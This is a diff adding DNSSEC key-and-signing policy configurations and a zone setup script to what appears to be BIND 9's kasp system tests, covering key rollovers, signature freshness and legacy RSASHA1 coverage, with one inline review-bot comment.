+ max-zone-ttl PT12H;
+ zone-propagation-delay PT5M;
+ retire-safety PT20M;
+ publish-safety PT5M;
+
+ parent-propagation-delay 1h;
+ parent-ds-ttl 2h;
+
+ keys {
+ csk lifetime unlimited algorithm @DEFAULT_ALGORITHM_NUMBER@;
+ };
+};
+
+dnssec-policy "zsk-prepub" {
+
+ signatures-refresh P1W;
+ signatures-validity P2W;
+ signatures-validity-dnskey P2W;
+
+ dnskey-ttl 3600;
+ publish-safety P1D;
+ retire-safety P2D;
+ purge-keys PT1H;
+
+ keys {
+ ksk key-directory lifetime P2Y algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P30D algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ zone-propagation-delay PT1H;
+ max-zone-ttl 1d;
+};
+
+dnssec-policy "ksk-doubleksk" {
+
+ signatures-refresh P1W;
+ signatures-validity P2W;
+ signatures-validity-dnskey P2W;
+
+ dnskey-ttl 2h;
+ publish-safety P1D;
+ retire-safety P2D;
+ purge-keys PT1H;
+
+ keys {
+ ksk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P1Y algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ zone-propagation-delay PT1H;
+ max-zone-ttl 1d;
+
+ parent-ds-ttl 3600;
+ parent-propagation-delay PT1H;
+};
+
+dnssec-policy "csk-roll" {
+
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ purge-keys PT1H;
+
+ keys {
+ csk key-directory lifetime P6M algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ zone-propagation-delay 1h;
+ max-zone-ttl P1D;
+
+ parent-ds-ttl 1h;
+ parent-propagation-delay 1h;
+};
+
+dnssec-policy "csk-roll2" {
+
+ signatures-refresh 12h;
+ signatures-validity P1D;
+ signatures-validity-dnskey P1D;
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 1h;
+ purge-keys 0;
+
+ keys {
+ csk key-directory lifetime P6M algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ zone-propagation-delay PT1H;
+ max-zone-ttl 1d;
+
+ parent-ds-ttl PT1H;
+ parent-propagation-delay P1W;
+};
diff --git a/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in b/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in
new file mode 100644
index 0000000..90a92a2
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in
@@ -0,0 +1,118 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "unlimited" {
+ dnskey-ttl 1234;
+
+ keys {
+ csk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "manual-rollover" {
+ dnskey-ttl 3600;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "multisigner-model2" {
+ dnskey-ttl 3600;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "migrate-to-dnssec-policy" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P6M algorithm 8;
+ zsk key-directory lifetime P6M algorithm 8;
+ };
+};
+
+dnssec-policy "rsasha256" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 8;
+ zsk key-directory lifetime P5Y algorithm 8;
+ zsk key-directory lifetime P1Y algorithm 8 3072;
+ };
+};
+
+dnssec-policy "rsasha512" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 10;
+ zsk key-directory lifetime P5Y algorithm 10;
+ zsk key-directory lifetime P1Y algorithm 10 3072;
+ };
+};
+
+dnssec-policy "ecdsa256" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 13;
+ zsk key-directory lifetime P5Y algorithm 13;
+ zsk key-directory lifetime P1Y algorithm 13 256;
+ };
+};
+
+dnssec-policy "ecdsa384" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 14;
+ zsk key-directory lifetime P5Y algorithm 14;
+ zsk key-directory lifetime P1Y algorithm 14 384;
+ };
+};
+
+dnssec-policy "checkds-ksk" {
+ dnskey-ttl 303;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "checkds-doubleksk" {
+ dnskey-ttl 303;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "checkds-csk" {
+ dnskey-ttl 303;
+
+ keys {
+ csk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "ttl" {
+ max-zone-ttl 299;
+};
diff --git a/bin/tests/system/kasp/ns3/policies/kasp.conf.in b/bin/tests/system/kasp/ns3/policies/kasp.conf.in
new file mode 100644
index 0000000..cb045bc
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/policies/kasp.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "policies/kasp-fips.conf";
+
+dnssec-policy "rsasha1" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 5;
+ zsk key-directory lifetime P5Y algorithm 5;
+ zsk key-directory lifetime P1Y algorithm 5 2000;
+ };
+};
+
+dnssec-policy "rsasha1-nsec3" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 7;
+ zsk key-directory lifetime P5Y algorithm 7;
+ zsk key-directory lifetime P1Y algorithm 7 2000;
+ };
+};
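Review bot: The `rsasha1` and `rsasha1-nsec3` policies in policies/kasp.conf.in use algorithms 5 and 7 with a 2000-bit ZSK and carry no comment saying why they live outside kasp-fips.conf.in. The split looks deliberate, since ns3/setup.sh only registers the rsasha1 zones when `testcrypto.sh -q RSASHA1` succeeds. A header comment like `/* SHA-1 based algorithms (5, 7): legacy coverage only, kept out of kasp-fips.conf. */` would record that intent and discourage reuse of these policies as examples.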
diff --git a/bin/tests/system/kasp/ns3/setup.sh b/bin/tests/system/kasp/ns3/setup.sh
new file mode 100644
index 0000000..8682f54
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/setup.sh
@@ -0,0 +1,1470 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns3/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + echo "$zone" >> zones +} + +# Set in the key state files the Predecessor/Successor fields. +# Key $1 is the predecessor of key $2. +key_successor() { + id1=$(keyfile_to_key_id "$1") + id2=$(keyfile_to_key_id "$2") + echo "Predecessor: ${id1}" >> "${2}.state" + echo "Successor: ${id2}" >> "${1}.state" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# +# Set up zones that will be initially signed. +# +for zn in default dnssec-keygen some-keys legacy-keys pregenerated \ + rumoured rsasha256 rsasha512 ecdsa256 ecdsa384 \ + dynamic dynamic-inline-signing inline-signing \ + checkds-ksk checkds-doubleksk checkds-csk inherit unlimited \ + manual-rollover multisigner-model2 +do + setup "${zn}.kasp" + cp template.db.in "$zonefile" +done + +# +# Set up RSASHA1 based zones +# +for zn in rsasha1 rsasha1-nsec3 +do + if (cd ..; $SHELL ../testcrypto.sh -q RSASHA1) + then + setup "${zn}.kasp" + cp template.db.in "$zonefile" + else + # don't add to zones. 
+ echo_i "setting up zone: ${zn}.kasp" + cp template.db.in "${zn}.kasp.db" + fi +done + +if [ -f ../ed25519-supported.file ]; then + setup "ed25519.kasp" + cp template.db.in "$zonefile" + cat ed25519.conf >> named.conf +fi + +if [ -f ../ed448-supported.file ]; then + setup "ed448.kasp" + cp template.db.in "$zonefile" + cat ed448.conf >> named.conf +fi + +# Set up zones that stay unsigned. +for zn in unsigned insecure max-zone-ttl +do + zone="${zn}.kasp" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + cp template.db.in $infile + cp template.db.in $zonefile +done + +# Some of these zones already have keys. +zone="dnssec-keygen.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.1 2>&1 + +zone="some-keys.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -G -a RSASHA256 -b 2048 -L 1234 $zone > keygen.out.$zone.1 2>&1 +$KEYGEN -G -a RSASHA256 -f KSK -L 1234 $zone > keygen.out.$zone.2 2>&1 + +zone="legacy-keys.kasp" +echo_i "setting up zone: $zone" +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 1234 $zone 2> keygen.out.$zone.1) +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $zone 2> keygen.out.$zone.2) +echo $ZSK > legacy-keys.kasp.zsk +echo $KSK > legacy-keys.kasp.ksk +# Predecessor keys: +Tact="now-9mo" +Tret="now-3mo" +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 1234 $zone 2> keygen.out.$zone.3) +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $zone 2> keygen.out.$zone.4) +$SETTIME -P $Tact -A $Tact -I $Tret -D $Tret "$ZSK" > settime.out.$zone.1 2>&1 +$SETTIME -P $Tact -A $Tact -I $Tret -D $Tret "$KSK" > settime.out.$zone.2 2>&1 + +zone="pregenerated.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -G -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.1 2>&1 +$KEYGEN -G -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.2 2>&1 + +zone="multisigner-model2.kasp" +echo_i "setting up zone: $zone" +# Import the ZSK sets of the other providers into their DNSKEY RRset. 
+ZSK1=$($KEYGEN -K ../ -a $DEFAULT_ALGORITHM -L 3600 $zone 2> keygen.out.$zone.1) +ZSK2=$($KEYGEN -K ../ -a $DEFAULT_ALGORITHM -L 3600 $zone 2> keygen.out.$zone.2) +# ZSK1 will be added to the unsigned zonefile. +cat "../${ZSK1}.key" | grep -v ";.*" >> "${zone}.db" +cat "../${ZSK1}.key" | grep -v ";.*" > "${zone}.zsk1" +rm -f "../${ZSK1}.*" +# ZSK2 will be used with a Dynamic Update. +cat "../${ZSK2}.key" | grep -v ";.*" > "${zone}.zsk2" +rm -f "../${ZSK2}.*" + +zone="rumoured.kasp" +echo_i "setting up zone: $zone" +Tpub="now" +Tact="now+1d" +keytimes="-P ${Tpub} -A ${Tact}" +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $keytimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -b 3072 -L 1234 $keytimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a RSASHA256 -L 1234 $keytimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $R $Tpub -r $R $Tpub -d $H $Tpub "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $Tpub -z $R $Tpub "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $R $Tpub -z $R $Tpub "$ZSK2" > settime.out.$zone.2 2>&1 + +# +# Set up zones that are already signed. +# + +# Zone to test manual rollover. +setup manual-rollover.kasp +T="now-1d" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -PS -x -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are set to expire long in the past, update immediately. 
+setup expired-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -PS -x -s now-2mo -e now-1mo -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, and can be reused. +setup fresh-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, but not fresh enough, update immediately. 
+setup unfresh-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, but the private KSK is missing. +setup ksk-missing.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +echo "KSK: yes" >> "${KSK}".state +echo "ZSK: no" >> "${KSK}".state +echo "Lifetime: 63072000" >> "${KSK}".state # PT2Y +rm -f "${KSK}".private + +# These signatures are still good, but the private ZSK is missing. 
+setup zsk-missing.autosign
+T="now-6mo"
+ksktimes="-P $T -A $T -P sync $T"
+zsktimes="-P $T -A $T"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+echo "KSK: no" >> "${ZSK}".state
+echo "ZSK: yes" >> "${ZSK}".state
+echo "Lifetime: 31536000" >> "${ZSK}".state # PT1Y
+rm -f "${ZSK}".private
+
+# These signatures are already expired, and the private ZSK is retired.
+setup zsk-retired.autosign
+T="now-6mo"
+ksktimes="-P $T -A $T -P sync $T"
+zsktimes="-P $T -A $T -I now"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -PS -x -s now-2w -e now-1mi -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+$SETTIME -s -g HIDDEN "$ZSK" > settime.out.$zone.3 2>&1
+
+#
+# The zones at enable-dnssec.autosign represent the various steps of the
+# initial signing of a zone.
+#
+
+# Step 1:
+# This is an unsigned zone and named should perform the initial steps of
+# introducing the DNSSEC records in the right order.
+setup step1.enable-dnssec.autosign
+cp template.db.in $zonefile
+
+# Step 2:
+# The DNSKEY has been published long enough to become OMNIPRESENT.
+setup step2.enable-dnssec.autosign
+# DNSKEY TTL: 300 seconds
+# zone-propagation-delay: 5 minutes (300 seconds)
+# publish-safety: 5 minutes (300 seconds)
+# Total: 900 seconds
+TpubN="now-900s"
+# RRSIG TTL: 12 hour (43200 seconds)
+# zone-propagation-delay: 5 minutes (300 seconds)
+# retire-safety: 20 minutes (1200 seconds)
+# Already passed time: -900 seconds
+# Total: 43800 seconds
+TsbmN="now+43800s"
+keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}"
+CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1)
+$SETTIME -s -g $O -k $R $TpubN -r $R $TpubN -d $H $TpubN -z $R $TpubN "$CSK" > settime.out.$zone.1 2>&1
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 3:
+# The zone signatures have been published long enough to become OMNIPRESENT.
+setup step3.enable-dnssec.autosign
+# Passed time since publications: 43800 + 900 = 44700 seconds.
+TpubN="now-44700s"
+# The key is secure for using in chain of trust when the DNSKEY is OMNIPRESENT.
+TcotN="now-43800s"
+# We can submit the DS now.
+TsbmN="now"
+keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}"
+CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1)
+$SETTIME -s -g $O -k $O $TcotN -r $O $TcotN -d $H $TpubN -z $R $TpubN "$CSK" > settime.out.$zone.1 2>&1
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 4:
+# The DS has been submitted long enough ago to become OMNIPRESENT.
+setup step4.enable-dnssec.autosign
+# DS TTL: 2 hour (7200 seconds)
+# parent-propagation-delay: 1 hour (3600 seconds)
+# retire-safety: 20 minutes (1200 seconds)
+# Total aditional time: 12000 seconds
+# 44700 + 12000 = 56700
+TpubN="now-56700s"
+# 43800 + 12000 = 55800
+TcotN="now-55800s"
+TsbmN="now-12000s"
+keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}"
+CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1)
+$SETTIME -s -g $O -P ds $TsbmN -k $O $TcotN -r $O $TcotN -d $R $TsbmN -z $O $TsbmN "$CSK" > settime.out.$zone.1 2>&1
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+setup step4.enable-dnssec.autosign
+
+#
+# The zones at zsk-prepub.autosign represent the various steps of a ZSK
+# Pre-Publication rollover.
+#
+
+# Step 1:
+# Introduce the first key. This will immediately be active.
+setup step1.zsk-prepub.autosign
+TactN="now"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 2:
+# It is time to pre-publish the successor ZSK.
+setup step2.zsk-prepub.autosign
+# According to RFC 7583:
+#
+# Tpub(N+1) <= Tact(N) + Lzsk - Ipub
+# Ipub = Dprp + TTLkey (+publish-safety)
+#
+# |3| |4| |5| |6|
+# | | | |
+# Key N |<-------Lzsk------>|
+# | | | |
+# Key N+1 | |<-Ipub->|<-->|
+# | | | |
+# Key N Tact
+# Key N+1 Tpub Trdy Tact
+#
+# Tnow
+#
+# Lzsk: 30d
+# Dprp: 1h
+# TTLkey: 1h
+# publish-safety: 1d
+# Ipub: 26h
+#
+# Tact(N) = Tnow + Ipub - Lzsk = now + 26h - 30d
+# = now + 26h - 30d = now − 694h
+TactN="now-694h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1
+cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >>
"$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+
+# Step 3:
+# After the publication interval has passed the DNSKEY of the successor ZSK
+# is OMNIPRESENT and the zone can thus be signed with the successor ZSK.
+setup step3.zsk-prepub.autosign
+# According to RFC 7583:
+#
+# Tpub(N+1) <= Tact(N) + Lzsk - Ipub
+# Tret(N) = Tact(N+1) = Tact(N) + Lzsk
+# Trem(N) = Tret(N) + Iret
+# Iret = Dsgn + Dprp + TTLsig (+retire-safety)
+#
+# |3| |4| |5| |6| |7| |8|
+# | | | | | |
+# Key N |<-------Lzsk------>|<-Iret->|<--->|
+# | | | | | |
+# Key N+1 | |<-Ipub->|<-->|<---Lzsk---- - -
+# | | | | | |
+# Key N Tact Tret Tdea Trem
+# Key N+1 Tpub Trdy Tact
+#
+# Tnow
+#
+# Lzsk: 30d
+# Ipub: 26h
+# Dsgn: 1w
+# Dprp: 1h
+# TTLsig: 1d
+# retire-safety: 2d
+# Iret: 10d1h = 241h
+#
+# Tact(N) = Tnow - Lzsk = now - 30d
+# Tret(N) = now
+# Trem(N) = Tnow + Iret = now + 241h
+# Tpub(N+1) = Tnow - Ipub = now - 26h
+# Tret(N+1) = Tnow + Lzsk = now + 30d
+# Trem(N+1) = Tnow + Lzsk + Iret = now + 30d + 241h
+# = now + 961h
+TactN="now-30d"
+TretN="now"
+TremN="now+241h"
+TpubN1="now-26h"
+TactN1="now"
+TretN1="now+30d"
+TremN1="now+961h"
+ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}"
+zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}"
+newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}"
+KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2)
+ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3)
+$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1
+$SETTIME -s -g $O -k $R $TpubN1 -z $H $TpubN1 "$ZSK2" > settime.out.$zone.3 2>&1
+# Set key rollover relationship.
+key_successor $ZSK1 $ZSK2
+# Sign zone.
+cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile"
+cp $infile $zonefile
